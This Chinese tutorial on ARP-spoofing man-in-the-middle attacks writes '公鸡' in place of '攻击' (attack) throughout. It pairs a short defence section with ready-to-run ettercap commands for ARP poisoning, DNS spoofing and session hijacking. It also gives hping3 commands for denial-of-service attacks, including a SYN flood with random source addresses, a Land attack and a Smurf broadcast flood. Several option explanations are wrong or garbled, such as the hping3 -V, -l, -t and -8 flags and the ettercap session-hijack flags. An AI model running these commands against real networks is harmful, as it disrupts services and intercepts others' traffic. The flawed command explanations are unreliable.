中间人公鸡之ARP欺骗

中间人公鸡（Man-in-the-Middle Attack，MITM）是一种网络公鸡放式，公鸡者位于通信双方之间，截获、篡改或伪造通信数据。ARP欺骗（Address Resolution Protocol Spoofing）是实现中间人公鸡的一种常见手段。

ARP协议是用来将网络层的IP地址映射到数据链路层的MAC地址的协议。在局域网中，当一台设备想要与另一台设备通信时，它首先发送ARP请求，询问目标IP地址对应的MAC地址是什么。接收到ARP请求的设备，如果其IP地址与请求中的目标IP地址匹配，就会回复自己的MAC地址。这样，两台设备就可以通过MAC地址进行数据交换了。

ARP欺骗的基本思路是让公鸡者的设备假冒目标设备的MAC地址，使得其他设备误以为公鸡者的设备就是目标设备。这样，公鸡者就可以截获原本应该发送给目标设备的数据包。

下面是一个ARP欺骗公鸡的基本步骤：

监听网络：公鸡者首先需要监听目标网络的流量，以便发现ARP请求和响应。

发送伪造的ARP响应：当检测到ARP请求时，公鸡者发送一个伪造的ARP响应，声称自己（公鸡者）的MAC地址就是请求中的目标IP地址的MAC地址。

建立虚假连接：如果其他设备相信了公鸡者发送的伪造ARP响应，它们就会开始将数据包发送到公鸡者的MAC地址。

截获和篡改数据：公鸡者现在可以截获发送给目标设备的数据包，并在必要时篡改这些数据包的内容。

维持公鸡：为了保持中间人状态，公鸡者需要定期发送伪造的ARP响应，以防止网络中的其他设备发现真实的MAC地址。

防御措施

为了防御ARP欺骗公鸡，可以采取以下措施：

静态ARP记录：在关键设备上设置静态ARP记录，绑定已知的IP地址和MAC地址对，这样可以避免接受伪造的ARP响应。

使用加密协议：使用端到端的加密协议（如HTTPS、SSH等），即使数据包被截获，公鸡者也无法轻易解密和篡改内容。

网络监控和入侵检测：部署网络监控和入侵检测系统，及时发现和阻断可疑的ARP响应。

交换机端口安全：在交换机上配置端口安全，限制可以访问某个端口的MAC地址数量或指定允许的MAC地址。

VLAN隔离：通过VLAN技术将网络分割成多个逻辑子网，减少ARP欺骗的公鸡面。

使用ARP防护工具：使用一些专门的ARP防护工具，如ArpGuard、Snort等，来检测和防御ARP欺骗公鸡。

通过以上措施，可以在一定程度上降低ARP欺骗公鸡的风险，保护网络的安全性。

ettercap

其中 <interface> 是你要使用的网络接口，例如 eth0 或 wlan0。

选择公鸡模式：

按 Ctrl + A 进入公鸡模式选择菜单。

选择你需要的公鸡模式，例如 ARP Poisoning。

设置目标：

按 T 键进入目标设置菜单。

添加目标设备和网关设备的 IP 地址。

执行公鸡：

按 Y 键开始执行公鸡。

监控流量：

在公鸡过程中，Ettercap 会显示捕获的数据包，可以实时监控和分析网络流量。

进阶用法

ARP 欺骗公鸡：

步骤：

启动 Ettercap。

选择 ARP 分类，然后选择 ARP Poisoning 公鸡模式。

设置目标设备和网关设备的 IP 地址。

开始执行公鸡。

示例命令：

ettercap -T -q -M arp:remote /192.168.1.0/ /192.168.1.254/

其中 -T 表示文本模式，-q 表示安静模式，-M arp:remote 指定使用 ARP 欺骗公鸡模式，/192.168.1.0/ 是目标网络地址，/192.168.1.254/ 是网关 IP 地址。

DNS 欺骗公鸡：

步骤：

启动 Ettercap。

选择 DNS 分类，然后选择 DNS Spoof 公鸡模式。

设置目标设备的 IP 地址和要欺骗的域名。

开始执行公鸡。

示例命令：

ettercap -T -q -M dns:remote /www.google.com/ /192.168.1.0/

其中 -M dns:remote 指定使用 DNS 欺骗公鸡模式，/www.google.com/ 是要欺骗的域名，/192.168.1.0/ 是目标网络地址。

会话劫持：

步骤：

启动 Ettercap。

执行 ARP 欺骗公鸡，使目标设备和网关设备之间的流量通过 Ettercap。

使用 ettercap -S 命令查看当前捕获的会话。

使用 ettercap -K <session_id> 命令劫持指定会话。

示例命令：

ettercap -T -q -M arp:remote /192.168.1.0/ /192.168.1.254/
ettercap -S  
ettercap -K 1

其中 <session_id> 是要劫持的会话 ID。

hping3

hping3 是一个用于教育和研究目的的网络工具，它可以发送自定义的 TCP/IP 数据包，并显示目标的回复。它类似于 ping 工具，但提供了更多的功能和灵活性，比如支持 TCP、UDP、ICMP 和 RAW-IP 协议，能够跟踪路由模式，能够在覆盖的信道之间发送文件，还支持使用 Tcl 脚本自动化地调用其 API。

基本用法

安装 hping3：

在 Debian/Ubuntu 系统上，可以使用以下命令安装 hping3：

sudo apt-get install hping3

1.

基本语法：

hping3 [options] <target>

1.

其中 <target> 是你要测试的目标 IP 地址或域名。

常用选项：

-c count：发送指定数量的数据包。

-d data：在数据包中包含指定的数据。

-f：开启碎片模式。

-i interval：设置数据包发送间隔。

-l length：设置数据包长度。

-p port：指定目标端口。

-s source_port：指定源端口。

-t ttl：设置数据包的生存时间（TTL）。

-v：增加输出的详细程度。

-V：显示版本信息。

示例

图中的文字主要涉及使用hping3工具发起不同类型的网络公鸡和扫描操作。下面是文字的提取以及相应代码的详解：

LandAttack（源自的地址相同）

hping3 -S*c 100 -a <sip> -p 22 <dip>

这行命令是进行Land公鸡，这是一种拒绝服务公鸡，其中源地址和目标地址被设置为相同的值。-S* 表示使用TCP SYN洪水模式，-c 100 表示发送100个数据包，-a <sip> 指定欺骗源IP地址，-p 22 指定目标端口，<dip> 为目标IP地址。

DOS公鸡

hping3 -S -d 100 -w 64 -p 445 -s 445 --flood --rand-source <IP>

这是一个针对SMB协议的拒绝服务公鸡命令。-S 使用TCP SYN洪水攻公鸡击，-d 100 设置数据包的大小为100字节，-w 64 设置TCP窗口大小为64字节，-p 445 和 -s 445 分别指定目标端口和源端口为445，这是SMB服务的默认端口，--flood 持续发包，不等待回应，--rand-source 使用随机源IP地址，<IP> 为目标IP地址。

Smurf公鸡

hping3 -1 --flood -a <dip> 1.1.1.255

Smurf公鸡是一种利用IP广播进行放大的拒绝服务公鸡。-1 表示使用ICMP协议，--flood 持续发包，-a <dip> 指定欺骗的源地址，1.1.1.255 是一个广播地址，用于向该网络内的所有主机发送请求。

扫描地址掩码

hping3 -1 -c 1 -V -C 17 <dip>

这是用来进行ICMP扫描的命令，-1 使用ICMP协议，-c 1 只发送一个数据包，-V 显示版本信息，-C 17 指定ICMP报文的类型为17（地址掩码请求），<dip> 为目标IP地址。

端口扫描

hping3 -c 1 -V -p 80 -s 5050 -<SFXYARPU> <dip>

这条命令用于对目标主机进行端口扫描。-c 1 发送一个数据包，-V 显示版本信息，-p 80 指定目标端口为80，通常用于HTTP服务，-s 5050 指定本地端口为5050，<SFXYARPU> 可能是某种特定参数或标识，<dip> 为目标IP地址。

使用sudo权限运行hping3

sudo hping3 -8 1-1000 -S 172.31.1.30

这是以sudo权限运行hping3的命令，可能用于确保有足够的权限执行某些操作。-8 表示每个数据包的大小，1-1000 指定发包的范围，-S 使用TCP SYN模式，172.31.1.30 为目标IP地址。

基本用法

发送 ICMP 数据包：

hping3 -c 10 192.168.1.1

这将向目标 IP 地址 192.168.1.1 发送 10 个 ICMP 数据包。

发送 TCP 数据包：

hping3 -c 10 -p 80 192.168.1.1

这将向目标 IP 地址 192.168.1.1 的 80 端口发送 10 个 TCP 数据包。

发送 UDP 数据包：

hping3 -c 10 -p 53 -u 192.168.1.1

这将向目标 IP 地址 192.168.1.1 的 53 端口发送 10 个 UDP 数据包。

跟踪路由模式：

hping3 -c 10 -t 192.168.1.1

这将向目标 IP 地址 192.168.1.1 发送 10 个数据包，并跟踪它们的路由路径。

进阶用法

自定义数据包内容：

使用 -d 选项可以指定数据包中的数据内容。

hping3 -c 10 -d 'Hello, World!' 192.168.1.1

这将向目标 IP 地址 192.168.1.1 发送 10 个包含 “Hello, World!” 的数据包。

设置数据包长度：

使用 -l 选项可以指定数据包的长度。

hping3 -c 10 -l 100 192.168.1.1

这将向目标 IP 地址 192.168.1.1 发送 10 个长度为 100 字节的数据包。

设置数据包发送间隔：

使用 -i 选项可以设置数据包之间的发送间隔。

hping3 -c 10 -i 1.0 192.168.1.1

这将向目标 IP 地址 192.168.1.1 发送 10 个数据包，每个数据包之间间隔 1 秒。

指定源端口和目标端口：

使用 -s 和 -p 选项可以指定源端口和目标端口。

hping3 -c 10 -s 1234 -p 80 192.168.1.1

这将从源端口 1234 向目标 IP 地址 192.168.1.1 的 80 端口发送 10 个数据包。

设置数据包的 TTL（Time To Live）：

使用 -t 选项可以设置数据包的 TTL 值。

hping3 -c 10 -t 10 192.168.1.1

这将向目标 IP 地址 192.168.1.1 发送 10 个 TTL 值为 10 的数据包。

使用碎片模式：

使用 -f 选项可以启用碎片模式，将数据包分成多个小片段。

hping3 -c 10 -f 192.168.1.1

这将向目标 IP 地址 192.168.1.1 发送 10 个碎片化的数据包。

跟踪路由模式：

使用 -T 选项可以启用跟踪路由模式（类似traceroute）。

hping3 -c 10 -T 192.168.1.1

这将向目标 IP 地址 192.168.1.1 发送 10 个数据包，并跟踪它们的路由路径。

使用脚本自动化：

hping3 支持使用 Tcl 脚本来自动化操作。

hping3 -c 10 -S -p 80 -t 10 -i 1.0 -d 'Hello, World!' -l 100 -s 1234 -T 192.168.1.1

这将向目标 IP 地址 192.168.1.1 发送 10 个数据包，每个数据包之间间隔 1 秒，数据包包含 “Hello, World!”，长度为 100 字节，源端口为 1234，目标端口为 80，TTL 值为 10，并跟踪它们的路由路径。